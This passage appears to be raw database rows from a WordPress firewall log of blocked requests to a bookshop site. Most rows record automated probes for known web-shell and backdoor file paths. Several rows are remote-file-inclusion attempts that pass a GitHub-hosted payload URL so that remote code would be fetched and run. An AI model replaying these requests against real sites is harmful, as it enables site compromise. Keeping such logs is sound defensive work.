Safari\\/537.36\"}','0qc83S5vsdA6lF1HipjVNUoD',0,1637243823.3541,450,'','POST',403,0,600,0,1,'',0),('69.163.224.119',1168367735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','lfYJFZDH4N3ksRqz9SVTauKh',0,1637245704.8814,522,'','POST',403,0,600,0,1,'',0),('103.144.253.38',1737555238,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','PwtLxs0XmQBjWFqpoHridDEz',0,1637247746.9835,830,'','POST',403,0,600,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8abH0w7jfsDdkAPmhTUoN6VX',0,1637248430.9532,446,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','i4nKlIzw9HFkdAJQMm2tvu5L',0,1637248461.8721,455,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4aCLEzcNp0rsKDd9m7XAS1f6',0,1637248482.3286,428,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','42Wk0qIrc1H8oxtMSEDV9vUP',0,1637248506.3247,452,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F5ygkjoEvfYGe6HUVA7Q4XOl',0,1637248555.3242,433,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fvgoQkzxdiFuZCLWJ418aAD6',0,1637248556.1827,393,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vTkPhjXAE5nsa6IpYc8QqNOM',0,1637248575.8933,1232,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sdkOm4BpSTQEFKwlcqNaIAeu',0,1637248602.6770,422,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5jeazWSXut436oxbRBUfNYAH',0,1637248647.3066,432,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','A5HUexw3Ng0Xj1Q9SlpcP2yu',0,1637248673.5410,418,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9oY0NqjWHcztLDS5hyskmGJF',0,1637248685.5855,420,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MAGbu16plcKoPk5hxafJVrB2',0,1637248707.2481,415,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','N2zXqZSoAJBaWh07ucyVIdGC',0,1637248731.5983,429,'','GET',403,0,700,0,1,'',0),('23.83.179.217',391361497,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945 Safari\\/537.36\"}','o6X5HLryMgNv3BGiAPhzxpd1',0,1637248747.7919,456,'','POST',403,0,600,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TBAQV0E5RjnDKFcafw4ObxlJ',0,1637248748.0179,397,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fWjXMu5hl0aFUoZQnrkw4RVm',0,1637248770.2969,559,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CSGvXAFH2YQt1VagyE59KLix',0,1637248796.2633,545,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qdgSmZUDkVcyrzJWwbMHGijB',0,1637248833.4184,514,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vwks0DjALGWg6hUEltZJxcaC',0,1637248848.8384,410,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fGPuE6rwyahFOj7q0oRvdbCl',0,1637248870.9871,914,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kO5l7TcCiZh4RHg6VjMb9Wns',0,1637248896.0271,389,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xLXpjRogeuDd12zv0Ifk7HZa',0,1637248912.3448,731,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MVfGhCWBiFjzYy8v7wDxtkHE',0,1637248936.0959,509,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sWE6ZNSGCnPFytz3YeDpAxfh',0,1637248961.5980,162,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0y5Jk1vjK7SRoxATQL8tDqH3',0,1637248983.1191,454,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RWufAIkxnKjMw90y3OGJCrad',0,1637249006.3248,152,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kDgmTi5cJtR4oFbfhzQX0OSH',0,1637249024.9790,155,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','o0nRXuhL9aKqHpx6z7s2dQSV',0,1637249052.4269,402,'','POST',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ILNbXZVOyQRftFGSaiJ7vdeT',0,1637249076.0639,422,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dTK1wANpklC3rjsyaSHOX82g',0,1637249093.9642,495,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YaydQFVAJCu4Kxbl26gWot0h',0,1637249115.2605,448,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bNiEq7djSgW5HAeIrYMxzsL9',0,1637249134.8373,1486,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pjrL6N0nyvY3i81PZHDtGuOo',0,1637249158.0707,1016,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XtqTljrvEKxJan78hY9FbIfp',0,1637249177.7554,1023,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l4jJQvG3EYympu8TBIr2xhaP',0,1637249206.0782,935,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','eHgbGwNklD5JhV2pCu7sLnjY',0,1637249215.8259,445,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','r62s4TKHd5bWVpQBGRvLFSPA',0,1637249227.4447,461,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kcalsPXRGN8I75OeSZpjmQBA',0,1637249242.1148,455,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wJq8yVSTkRIGLnWiQjNl5Dub',0,1637249255.4299,440,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','eSTqWs7nErc3L8OxzP6NAgU2',0,1637249271.1134,483,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GxXM9KRWtgnks4o5fcB0lZpy',0,1637249282.9829,409,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Esyg4IfPq5l0TFt7SYBeziL6',0,1637249293.5157,434,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PoVQTzj4dhY9AMX87g1r2Nkq',0,1637249316.3903,415,'','GET',403,0,700,0,1,'',0),('45.144.225.142',764469646,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0xiUWfevAt6F74aYLGuIrqym',0,1637249324.9578,417,'','GET',403,0,700,0,1,'',0),('159.203.115.159',2680910751,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','fVaH7YzFNOtDwx0npSGu5J64',0,1637249665.6922,549,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ntbCh6GyM8gIo53iFqZYTvmw',0,1637250300.3172,507,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','v98S1cWpR2YwloUBqQIPbgns',0,1637250302.7765,134,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','o1OKGrV7ilhLsuEbSgYQJ0FT',0,1637250305.0433,537,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2XFl65AWSHzcJTtyjZhBOMsm',0,1637250307.5126,487,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hyXCLM98tkIHjvN2AaSdp4sY',0,1637250314.5390,545,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Je5H2Uw8jadoMlWEkATBnRxv',0,1637250316.9428,526,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cj0uR7OMhBCoJrFHdm1SexXl',0,1637250319.4302,498,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yItJCL9Qen58ZpDhYu2KN0z3',0,1637250322.8334,487,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F3Vv9axpehLRtBS6Iq5cDksM',0,1637250328.0574,1240,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YhXHc0fKWizU43MeJPxASplT',0,1637250331.2246,407,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hTE6GonLm4O2csPq0H75Nje3',0,1637250333.8674,124,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hM7p0Z2ci4LUV5YTWufmkHKS',0,1637250335.7920,121,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pVthOMlS6Q1vLKFBfxscNWIE',0,1637250337.6527,129,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UAPRarD0ds8lp4goZfxq9hXk',0,1637250340.1911,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QexEJ5Fzsq1ybUTSPXa2H78Z',0,1637250342.8477,149,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pa4CGX7OEUYcJvblAPKedt59',0,1637250344.7906,130,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CMj3kObUaQmVx6lfnY08JSgB',0,1637250346.9659,119,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OZfPMq3pboemsCzdTiKj4EW9',0,1637250349.1060,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vEY8D7kAO52zmeKFfL6h1nXN',0,1637250351.7512,149,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','snPtvFMUGAjL9kOaN10EX8p4',0,1637250354.3993,431,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hLoGmgsUSNFi1wCHvE4O5XDT',0,1637250356.8947,684,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','NtZwV3BlijYev7156mfGbIJD',0,1637250359.5171,443,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VEzBLuQ7F5hylrIXmJOYNKDc',0,1637250361.8989,395,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HkpPuqlhcfKdWN95TzbtOV8F',0,1637250368.7200,447,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 